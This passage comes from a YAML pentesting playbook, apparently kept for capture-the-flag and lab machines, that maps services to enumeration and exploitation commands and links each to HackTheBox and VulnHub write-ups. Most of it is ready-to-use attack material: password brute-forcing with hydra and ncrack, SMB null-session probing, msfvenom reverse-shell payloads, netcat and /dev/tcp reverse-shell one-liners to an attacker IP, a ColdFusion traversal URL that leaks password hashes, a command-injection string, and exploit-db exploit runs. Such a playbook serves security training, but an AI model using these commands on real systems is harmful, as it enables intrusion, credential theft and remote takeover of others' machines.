          \ is present, we can privesc\n\nnmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122\
          \ <targetip> -p <targetport>\nhydra -s <targetport> -C ./wordlists/mysql-default-userpass.txt\
          \ -u -f <targetip> mysql\n"
        description: null
        ports:
        - 3306/tcp
        references:
        - null
      enumerate_proto_nfs:
        cli: 'nmap -sV --script=nfs-* <targetip>

          showmount -e <targetip>

          '
        description: null
        ports:
        - 111/tcp
        - 111/udp
        - 2049/tcp
        - 2049/udp
        references:
        - null
      enumerate_proto_oracle:
        cli: 'msfcli auxiliary/scanner/oracle/tnslsnr_version rhosts=<targetip> E

          msfcli auxiliary/scanner/oracle/sid_enum rhosts=<targetip> E

          tnscmd10g status -h <targetip>

          hydra -uf -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip>
          -s 1521 oracle-listener

          '
        description: null
        ports:
        - 1521/tcp
        references:
        - null
      enumerate_proto_postgres:
        cli: 'hydra -s <targetport> -C /usr/share/sparta/wordlists/postgres-default-userpass.txt
          -u -f <targetip> postgres

          hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt
          <targetip> -s 1521 postgres

          '
        description: null
        ports:
        - 1521/tcp
        references:
        - null
      enumerate_proto_rdp:
        cli: 'perl /usr/share/sparta/scripts/rdp-sec-check.pl <targetip>:<targetport>

          ncrack -vv --user administrator -P /usr/share/wordlists/rockyou.txt rdp://<targetip>

          '
        description: null
        ports:
        - 8080/tcp
        references:
        - null
      enumerate_proto_rpc:
        cli: 'rpcinfo -p <targetip>

          '
        description: null
        ports:
        - 135/tcp
        - 111/tcp
        references:
        - null
      enumerate_proto_smb:
        cli: "locate all smb scripts on kali and run them to gather details:\n  locate\
          \ *.nse | grep smb\ntry enum4linux to get open shares, permissions and local\
          \ users:\n  enum4linux -a <targetip>\nnbtscan -vhr <targetip>\nscans:\n\
          \  nmap -p139,445 --script smb-vuln-* --script-args=unsafe=1 <targetip>\n\
          \  nmap -p139,445 --script smb-enum-* --script-args=unsafe=1 <targetip>\n\
          \  null sessions: bash -c \"echo 'srvinfo' | rpcclient -U % <targetip>\"\
          \n  groups: nmap -vv -p139,445 --script=smb-enum-groups <targetip>\n  users:\
          \ bash -c \"echo 'enumdomusers' | rpcclient -U % <targetip>\"\n  admins:\
          \ net rpc group members \"Domain Admins\" -U % -I <targetip>\n  shares:\
          \ nmap -vv -p139,445 --script=smb-enum-shares <targetip>\n  sessions: nmap\
          \ -vv -p139,445 --script=smb-enum-sessions <targetip>\n  policies: nmap\
          \ -vv -p139,445 --script=smb-enum-domains <targetip>\n  version: use auxiliary/scanner/smb/smb_version\n\
          \  bruteforce: use auxiliary/scanner/smb/smb_login\n\nbash -c \"echo 'enumdomusers'\
          \ | rpcclient <targetip> -U%\"\nbash -c \"echo 'srvinfo' | rpcclient <targetip>\
          \ -U%\"\nbash /usr/share/sparta/scripts/smbenum.sh <targetip>\nenum4linux\
          \ <targetip>\nnbtscan -v -h <targetip>\nnet rpc group members \"Domain Admins\"\
          \ -I <targetip> -U%\nnmap -p<targetport> --script=smb-enum-domains <targetip>\
          \ -vvvvv\nnmap -p<targetport> --script=smb-enum-groups <targetip> -vvvvv\n\
          nmap -p<targetport> --script=smb-enum-sessions <targetip> -vvvvv\nnmap -p<targetport>\
          \ --script=smb-enum-shares <targetip> -vvvvv\nnmap -sV -Pn -vv -p <targetport>\
          \ --script=smb-vuln* --script-args=unsafe=1 <targetip>\npython /usr/share/doc/python-impacket-doc/examples/samrdump.py\
          \ <targetip> <targetport>/SMB\nsmbclient -L <targetip>\nsmbclient //<targetip>/admin$\
          \ -U john\nsmbclient //<targetip>/ipc$ -U john\nsmbclient //<targetip>/tmp\n\
          smbclient \\\\<targetip>\\ipc$ -U john\nwinexe -U username //<targetip>\
          \ \"cmd.exe\" --system\n"
        description: null
        ports:
        - 139/tcp
        - 445/tcp
        references: []
        writeups:
        - datetime: 20200428
          infra: HackTheBox
          name: Archetype
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_smb
          - enumerate_proto_smb_anonymous_access
          - enumerate_proto_sql
          - enumerate_proto_sql_ssis_dtsconfig
          - exploit_sql_login
          - exploit_sql_xpcmdshell
          - enumerate_app_powershell_history
          - privesc_psexec_login
          url: https://app.hackthebox.eu/machines/287
          verbose_id: htb#287
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
      enumerate_proto_smb_anonymous_access:
        cli: "# connect to and explore smb share:\n  smbclient -N -L \\\\\\\\<targetip>\n\
          \  smbclient -N \\\\\\\\<targetip>\\\\$share\n# look for null sessions \"\
          allows sessions using username '', password ''\", use smbclient to connect\
          \ and explore smb share:\n  enum4linux -a <targetip>\n  smbclient -U \"\"\
          \ //<targetip>/share$ (password: \"\")\n  smbclient //<targetip>/share$\
          \ -U lazysysadmin -p 445\n"
        description: open shares, anonymous logins
        ports:
        - 139/tcp
        - 445/tcp
        references: []
        writeups:
        - datetime: 20200428
          infra: HackTheBox
          name: Archetype
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_smb
          - enumerate_proto_smb_anonymous_access
          - enumerate_proto_sql
          - enumerate_proto_sql_ssis_dtsconfig
          - exploit_sql_login
          - exploit_sql_xpcmdshell
          - enumerate_app_powershell_history
          - privesc_psexec_login
          url: https://app.hackthebox.eu/machines/287
          verbose_id: htb#287
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
      enumerate_proto_smtp:
        cli: "smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt\
          \ -t <targetip> -p <targetport>\nsmtp-user-enum -M EXPN -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt\
          \ -t <targetip> -p <targetport>\nsmtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt\
          \ -t <targetip> -p <targetport>\n# send email:\n  swaks --to eric@madisonhotels.com\
          \ --from vvaughn@polyfector.edu --server 192.168.92.167:2525 --body \"My\
          \ kid will be a soccer player\" --header \"Subject: My kid will be a soccer\
          \ player\"\n"
        description: null
        ports:
        - 25/tcp
        references:
        - null
      enumerate_proto_snmp:
        cli: "snmpcheck -t <targetip>\nnmap -sU -p 161 --script=*snmp* <targetip>\n\
          xprobe2 -v -p udp:161:open <targetip>\nuse auxiliary/scanner/snmp/snmp_login\n\
          use auxiliary/scanner/snmp/snmp_enum\nenumerate open ports, running services\
          \ and applications:\n  snmpwalk -v2c -c public <targetip> .\n  snmp-check\
          \ -t 5 -c public <targetip>\nscan using multiple community strings:\n  echo\
          \ public >community\n  echo private >>community\n  echo manager >>community\n\
          \  for ip in $(seq 200 254); do echo 10.11.1.${ip}; done >ips\n  onesixtyone\
          \ -c community -i ips\n  onesixtyone -c /usr/share/wordlists/dirb/small.txt\
          \ <targetip>\nenumerate windows users:\n  snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25\n\
          \  for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do snmpwalk\
          \ -v 1 -c $i 192.168.1.200; done | grep -e \"Timeout\"\nenumerate current\
          \ windows processes:\n  snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2\n\
          enumerate windows open tcp ports:\n  snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.6.13.1.3\n\
          enumerate installed software:\n  snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.6.3.1.2\n"
        description: null
        ports:
        - 161/tcp
        references:
        - null
      enumerate_proto_sql:
        cli: "locate all sql scripts on kali and run them to gather details:\n  locate\
          \ *.nse | grep sql\n"
        description: null
        ports:
        - 1433/tcp
        references: []
        writeups:
        - datetime: 20200428
          infra: HackTheBox
          name: Archetype
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_smb
          - enumerate_proto_smb_anonymous_access
          - enumerate_proto_sql
          - enumerate_proto_sql_ssis_dtsconfig
          - exploit_sql_login
          - exploit_sql_xpcmdshell
          - enumerate_app_powershell_history
          - privesc_psexec_login
          url: https://app.hackthebox.eu/machines/287
          verbose_id: htb#287
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
      enumerate_proto_sql_ssis_dtsconfig:
        cli: 'cat *.dtsConfig

          '
        description: The `.dtsConfig` files are used by [SQL Server Integration Services
          (SSIS)](https://en.wikipedia.org/wiki/SQL_Server_Integration_Services) and
          can contain plaintext credentials for SQL users.
        ports:
        - 1433/tcp
        references: []
        writeups:
        - datetime: 20200428
          infra: HackTheBox
          name: Archetype
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_smb
          - enumerate_proto_smb_anonymous_access
          - enumerate_proto_sql
          - enumerate_proto_sql_ssis_dtsconfig
          - exploit_sql_login
          - exploit_sql_xpcmdshell
          - enumerate_app_powershell_history
          - privesc_psexec_login
          url: https://app.hackthebox.eu/machines/287
          verbose_id: htb#287
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
      enumerate_proto_ssh:
        cli: "authorized_keys:\n  ssh-keygen -t rsa -b 2048\n    enter a custom filename\n\
          \  copy contents of <filename>.pub to /home/<username>/.ssh/authorized_keys\n\
          \  ssh -i <filename>.pub <username>@<targetip>\nssh enum:\n  msf > use auxiliary/scanner/ssh/ssh_enumusers\n\
          \  msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 10.11.1.0/24\n\
          \  msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt\n\
          \  msf auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 254\n  msf auxiliary(scanner/ssh/ssh_enumusers)\
          \ > run\n"
        description: null
        ports:
        - 22/tcp
        references: []
        writeups:
        - datetime: 20190909
          infra: VulnHub
          name: 'BSides Vancouver: 2018 (Workshop)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_ftp
          - enumerate_proto_ssh
          - exploit_ssh_bruteforce
          - enumerate_proto_http
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
          verbose_id: vh#231
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
      enumerate_proto_telnet:
        cli: "nmap -p 23 --script telnet-brute --script-args userdb=/usr/share/metasploit-framework/data/wordlists/unix_users,passdb=/usr/share/wordlists/rockyou.txt,telnet-brute.timeout=20s\
          \ <targetip>\nuse auxiliary/scanner/telnet/telnet_version\n  msf auxiliary(telnet_version)\
          \ > set RHOSTS 10.11.1.0/24\n  msf auxiliary(telnet_version) > set THREADS\
          \ 254\n  msf auxiliary(telnet_version) > run\nuse auxiliary/scanner/telnet/telnet_login\n\
          \  msf auxiliary(telnet_login) > set BLANK_PASSWORDS false\n  msf auxiliary(telnet_login)\
          \ > set PASS_FILE passwords.txt\n  msf auxiliary(telnet_login) > set RHOSTS\
          \ 10.11.1.0/24\n  msf auxiliary(telnet_login) > set THREADS 254\n  msf auxiliary(telnet_login)\
          \ > set USER_FILE users.txt\n  msf auxiliary(telnet_login) > set VERBOSE\
          \ false\n  msf auxiliary(telnet_login) > run\n"
        description: null
        ports:
        - 23/tcp
        references:
        - null
      enumerate_proto_webdav:
        cli: "default pass for xampp: wampp/xampp\ntest uploading different file extensions:\n\
          \  davtest -url http://10.11.1.10\ntest uploading different file extensions,\
          \ with given creds:\n  davtest -url http://10.11.1.10 -auth username:password\n\
          remove files uploaded during test:\n  davtest -cleanup\ncreate a reverse\
          \ shell (asp file even if not allowed)\nconnect to webdav share, bypass\
          \ upload restrictions:\n  cadaver http://10.11.1.10\n  mkdir temp\n  cd\
          \ temp\n  put revshell.asp revshell.txt\n  copy revshell.txt revshell.asp\n\
          open nc to catch reverse shell connection\nbrowse webdav share and open\
          \ uploaded file\n"
        description: null
        ports:
        - 80/tcp
        - 8080/tcp
        - 443/tcp
        references:
        - null
    exploit:
      exploit_apache_tomcat:
        cli: 'msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport>
          -f war >backdoor.war

          # deploy war file through tomcat manager

          # start netcat listener and visit the link for uploaded jsp file to trigger
          webshell

          jar -xvf backdoor.war

          http://<targetip>:<targetport>/<.war filename w/o extension>/<.jsp filename
          in war archive w/ extension>

          '
        description: leverage Tomcat Web Application Manager to deploy a malicious
          .war file that spawns a reverse shell
        references:
        - https://0xrick.github.io/hack-the-box/jerry/
      exploit_bash_reverseshell:
        cli: 'nc -nlvp <attackerport>

          rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <attackerip>
          <attackerport> >/tmp/f

          '
        description: spawn a bash reverse shell to gain interactive access on the
          target system
        references:
        - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
        - https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells
        writeups:
        - datetime: 20191011
          infra: VulnHub
          name: 'Misdirection: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_webshell
          - exploit_bash_reverseshell
          - privesc_sudoers
          - privesc_passwd_writable
          url: https://www.vulnhub.com/entry/misdirection-1,371/
          verbose_id: vh#371
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf
      exploit_bof:
        cli: ''
        description: create a bof exploit to execute arbitrary code and gain interactive
          access on the target system
        references: []
        writeups:
        - datetime: 20190831
          infra: VulnHub
          name: 'Brainpan: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png"
            width="100" height="100" />
          points: 40
          status: public
          tags:
          - exploit_bof
          - privesc_anansi
          - privesc_sudo
          url: https://www.vulnhub.com/entry/brainpan-1,51/
          verbose_id: vh#51
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf
      exploit_cloudme_bof:
        cli: 'msfvenom -p windows/shell_reverse_tcp lhost=<attackerip> lport=<attackerport>
          -b "\x00\x0a\x0d" -f python -a x86 --platform windows -e x86/shikata_ga_nai

          sudo nc -nlvp <attackerport>

          python 48389.py

          '
        description: the CloudMe version 1.11.12 is vulnerable to a buffer overflow
          that could be used to gain interactive access on the target system, possibly
          with elevated privileges
        references:
        - https://www.exploit-db.com/exploits/48389
        writeups:
        - datetime: 20200722
          infra: HackTheBox
          name: Buff
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_http
          - exploit_gymsystem_rce
          - exploit_cloudme_bof
          url: https://app.hackthebox.eu/machines/263
          verbose_id: htb#263
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf
      exploit_cmdexec:
        cli: 'nc -nlvp <attackerport>

          bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1

          '
        description: execute arbitrary commands via a command execution vulnerability
          and gain interactive access on the target system
        references: []
        writeups:
        - datetime: 20190928
          infra: VulnHub
          name: 'Kioptrix: Level 1.1 (#2)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_sqli
          - exploit_cmdexec
          - privesc_kernel_ipappend
          url: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
          verbose_id: vh#23
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf
      exploit_coldfusion_dirtraversal:
        cli: 'http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

          '
        description: coldfusion 8 is vulnerable to a directory traversal and exposes
          SHA1 hash of the user password
        references:
        - https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560
        - https://www.exploit-db.com/exploits/14641
      exploit_coldfusion_scheduledtasks:
        cli: "http://<targetip>:<targetport>/CFIDE/administrator/enter.cfm\nhttp://<targetip>:<targetport>/CFIDE/administrator/settings/mappings.cfm\
          \ # check the CFIDE logical path mapping to identify the file upload location,\
          \ C:\\ColdFusion8\\wwwroot\\CFIDE\nmsfvenom -p java/jsp_shell_reverse_tcp\
          \ LHOST=<attackerip> LPORT=<attackerport> -f raw >revshell.jsp\nnc -nlvp\
          \ <attackerport>\nhttp://<targetip>:<targetport>/CFIDE/administrator/scheduler/scheduletasks.cfm\n\
          \  # set url to revshell.jsp link\n  # mark the save output to file option\n\
          \  # set file to C:\\ColdFusion8\\wwwroot\\CFIDE\\revshell.jsp\n# run the\
          \ scheduled task on demand to upload the revshell.jsp file\n  http://<targetip>:<targetport>/CFIDE/revshell.jsp\n"
        description: coldfusion 8 allows to obtain remote shell by creating and executing
          a new scheduled task. this is a post-authentication vulnerability
        references:
        - https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560
      exploit_command_injection:
        cli: '# submit escaped input: "\";whoami\n"

          '
        description: certain webapps couldbe vulebrable to command injection via input
          text fields
        references:
        - https://muirlandoracle.co.uk/2020/05/30/year-of-the-fox-write-up/
        writeups:
        - datetime: 20200730
          infra: TryHackMe
          name: Year of the Fox
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png"
            width="100" height="100" />
          points: null
          status: public
          tags:
          - enumerate_proto_http
          - exploit_command_injection
          - privesc_env_relative_path
          url: https://tryhackme.com/room/yotf
          verbose_id: tryhackme#yotf
          writeup: https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf
      exploit_credsreuse:
        cli: ''
        description: Reuse credentials already found for a service to interact with
          another service
        references: []
        writeups:
        - datetime: 20191113
          infra: HackTheBox
          name: Blocky
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_plugin
          - exploit_credsreuse
          - privesc_sudoers
          url: https://app.hackthebox.eu/machines/48
          verbose_id: htb#48
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf
        - datetime: 20191008
          infra: VulnHub
          name: 'Kioptrix: Level 1.3 (#4)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_sqli
          - exploit_credsreuse
          - privesc_shell_escape
          - privesc_mysql_root
          - privesc_mysql_udf
          url: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
          verbose_id: vh#25
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf
        - datetime: 20191029
          infra: VulnHub
          name: 'LazySysAdmin: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_smb_nullsession
          - exploit_smb_web_root
          - exploit_php_reverseshell
          - exploit_credsreuse
          - exploit_wordpress_template
          - privesc_sudo
          url: https://www.vulnhub.com/entry/lazysysadmin-1,205/
          verbose_id: vh#205
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
        - datetime: 20191010
          infra: VulnHub
          name: 'Lord Of The Root: 1.0.1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_sqli
          - exploit_credsreuse
          - privesc_kernel_overlayfs
          - privesc_mysql_root
          - privesc_mysql_udf
          url: https://www.vulnhub.com/entry/lord-of-the-root-101,129/
          verbose_id: vh#129
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf
        - datetime: 20191028
          infra: VulnHub
          name: 'Node: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_nodejs
          - exploit_credsreuse
          - exploit_mongodb
          - privesc_setuid
          url: https://www.vulnhub.com/entry/node-1,252/
          verbose_id: vh#252
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf
      exploit_defaultcreds:
        cli: ''
        description: Use default credentials to interact with a service
        references: []
        writeups:
        - datetime: 20191112
          infra: HackTheBox
          name: Mirai
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_defaultcreds
          - privesc_sudoers
          url: https://app.hackthebox.eu/machines/64
          verbose_id: htb#64
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf
      exploit_drupal_passwordcrack:
        cli: 'hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
          --force

          '
        description: Crack a drupal password hash
        references:
        - https://0xdf.gitlab.io/2019/03/12/htb-bastard.html
      exploit_ftp_anonymous:
        cli: ''
        description: Interact with the ftp service using `anonymous/any` credentials
        references: []
        writeups:
        - datetime: 20191105
          infra: HackTheBox
          name: Devel
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_ftp_anonymous
          - exploit_ftp_web_root
          - exploit_iis_asp_reverseshell
          - privesc_windows_ms11_046
          url: https://app.hackthebox.eu/machines/3
          verbose_id: htb#3
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf
      exploit_ftp_web_root:
        cli: ''
        description: FTP server's root directory is mapped to the web server's root
          directory. Upload a reverse shell file native to the web server using ftp
          server (`anonymous` login or default creds or creds reuse or some exploit)
          and trigger it's execution to gain interactive access on the target system
        references: []
        writeups:
        - datetime: 20191105
          infra: HackTheBox
          name: Devel
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_ftp_anonymous
          - exploit_ftp_web_root
          - exploit_iis_asp_reverseshell
          - privesc_windows_ms11_046
          url: https://app.hackthebox.eu/machines/3
          verbose_id: htb#3
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf
      exploit_gpp_groupsxml:
        cli: "smbclient //10.10.10.100/Replication\nget ..\\\\active.htb\\Policies\\\
          {31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\Groups\\Groups.xml\
          \ Groups.xml\nexit\ncat Groups.xml \ngpp-decrypt \"edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ\"\
          \nsmbclient //10.10.10.100/Users -U SVC_TGS\n"
        description: the Groups.xml file lists username and encrypted password that
          can be useful to gain initial access on the target system. access this file
          via an open ftp/smb share or some other method
        references:
        - https://0xrick.github.io/hack-the-box/active/
        - https://adsecurity.org/?p=2288
      exploit_gymsystem_rce:
        cli: 'python 48506.py http://<targetip>:<targetport>/


          curl "http://<targetip>:<targetport>/upload/kamehameha.php?telepathy=whoami"

          '
        description: use `/contacts.php` to confirm the version is 1.0 and fire this
          exploit to get a pseudo-interactive shell on the target machine. you can
        references:
        - https://www.exploit-db.com/exploits/48506
        writeups:
        - datetime: 20200722
          infra: HackTheBox
          name: Buff
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_http
          - exploit_gymsystem_rce
          - exploit_cloudme_bof
          url: https://app.hackthebox.eu/machines/263
          verbose_id: htb#263
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf
      exploit_hfs_cmd_exec:
        cli: 'python 39161.py <targetip> <targetport>

          '
        description: HFS (`HttpFileServer 2.3.x`) is vulnerable to remote command
          execution
        references:
        - https://www.exploit-db.com/exploits/39161
        - https://nvd.nist.gov/vuln/detail/CVE-2014-6287
        writeups:
        - datetime: 20191104
          infra: HackTheBox
          name: Optimum
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_hfs_cmd_exec
          - privesc_windows_ms16_098
          url: https://app.hackthebox.eu/machines/6
          verbose_id: htb#6
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf
      exploit_iis_asp_reverseshell:
        cli: 'msfvenom -p windows/shell/reverse_tcp LHOST=<attackerip> LPORT=<attackerport>
          -f asp >rs.asp

          msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport>
          -f aspx >rs.aspx

          '
        description: use an `asp`|`aspx` reverse shell to gain interactive access
          on the target system. useful when Microsoft IIS server is found during enumeration.
          might need a separate vulnerability to upload the reverse shell file on
          target system (use burp to bypass filename filter - revshell.aspx%00.jpg)
        references:
        - https://highon.coffee/blog/reverse-shell-cheat-sheet/#kali-aspx-shells
        writeups:
        - datetime: 20191105
          infra: HackTheBox
          name: Devel
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_ftp_anonymous
          - exploit_ftp_web_root
          - exploit_iis_asp_reverseshell
          - privesc_windows_ms11_046
          url: https://app.hackthebox.eu/machines/3
          verbose_id: htb#3
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf
      exploit_iis_webdav:
        cli: "msfconsole\n  use windows/iis/iis_webdav_scstoragepathfromurl\n    set\
          \ rhost <targetip>\n    set rport <targetport>\n    show options\n    exploit\n\
          \  use windows/iis/iis_webdav_upload_asp\n    set rhost <targetip>\n   \
          \ set rport <targetport>\n    show options\n    exploit\n"
        description: multiple iis webdav issues. can use msf exploits `windows/iis/iis_webdav_scstoragepathfromurl`
          or `windows/iis/iis_webdav_upload_asp` to gain interactive access on the
          target system
        references:
        - https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl
        - https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_upload_asp
        writeups:
        - datetime: 20191104
          infra: HackTheBox
          name: Grandpa
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_iis_webdav
          - privesc_windows_ms14_070
          url: https://app.hackthebox.eu/machines/13
          verbose_id: htb#13
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf
        - datetime: 20191104
          infra: HackTheBox
          name: Granny
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_iis_webdav
          - privesc_windows_ms15_051
          url: https://app.hackthebox.eu/machines/14
          verbose_id: htb#14
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf
      exploit_lotuscms:
        cli: 'nc -nlvp <attackerport>

          ./lotusRCE.sh <targetip>

          '
        description: LotusCMS is vulnerable to remote code execution
        references:
        - https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh
        writeups:
        - datetime: 20190929
          infra: VulnHub
          name: 'Kioptrix: Level 1.2 (#3)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_lotuscms
          - privesc_sudoers
          - privesc_sudo
          url: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
          verbose_id: vh#24
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf
      exploit_modssl:
        cli: "gcc -o 47080 47080.c -lcrypto\n./47080\n  0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2\n\
          ./47080 0x6b <targetip> <targetport>\n"
        description: Apache `mod_ssl < 2.8.7` is vulnerable to remote code execution
        references:
        - https://www.exploit-db.com/exploits/47080
        - https://nvd.nist.gov/vuln/detail/CVE-2002-0082
        writeups:
        - datetime: 20190928
          infra: VulnHub
          name: 'Kioptrix: Level 1 (#1)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_modssl
          - privesc_modssl
          url: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
          verbose_id: vh#22
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf
      exploit_mongodb:
